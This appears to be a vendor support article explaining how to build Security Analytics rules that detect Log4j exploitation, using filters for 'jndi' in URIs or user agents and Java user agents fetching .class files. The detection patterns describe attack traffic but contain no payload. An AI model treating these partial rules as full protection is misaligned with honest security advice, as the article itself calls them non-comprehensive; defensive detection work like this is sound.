Can the Log4j vulnerability be detected by Security Analytics?
search cancel

Can the Log4j vulnerability be detected by Security Analytics?

book

Article ID: 231725

calendar_today

Updated On:

Products

Security Analytics

Issue/Introduction

With the details around the Log4j vulnerability published in late 2021, analysts are interested in using Security Analytics to detect when they have been compromised by the Log4j vulnerability.  Fortunately Security Analytics itself is not vulnerable (see Log4j2 vulnerability in Security Analytics? for details).

Although there are multiple ways to use Security Analytics to detect possible infiltration using the Log4j vulnerability, these are just a few suggestions of what you could do.  This is by no means a comprehensive solution.

 

Resolution

The Log4j exploits typically has the string "jndi" in the http headers.  You could add a rule with http_uri~jndi or user_agent~jndi.  The attack uses two flows.  The first flow is where user_agent~jndi would be present.  The other flow of the attack is where the class files are downloaded.  It is much easier to detect the first flow, as the second flow seems to be related to LDAP.

If you want to find .class files that were served from ldap, create two indicators:

Indicator 1:  log4j_ua_ext (or whatever name you prefer)

  1. Add the following two filters:
    1. user_agent~java
    2. file_extension=class

Indicator 2:  log4j_ua_mime (or whatever name you prefer)

  1. Add the following two filters:
    1. user_agent~java
    2. mime_type="application/java-vm"   (the double quotes are mandatory on the mime_type)

Create a log4j_rule and add the two indicators above and specify the Type as Alert.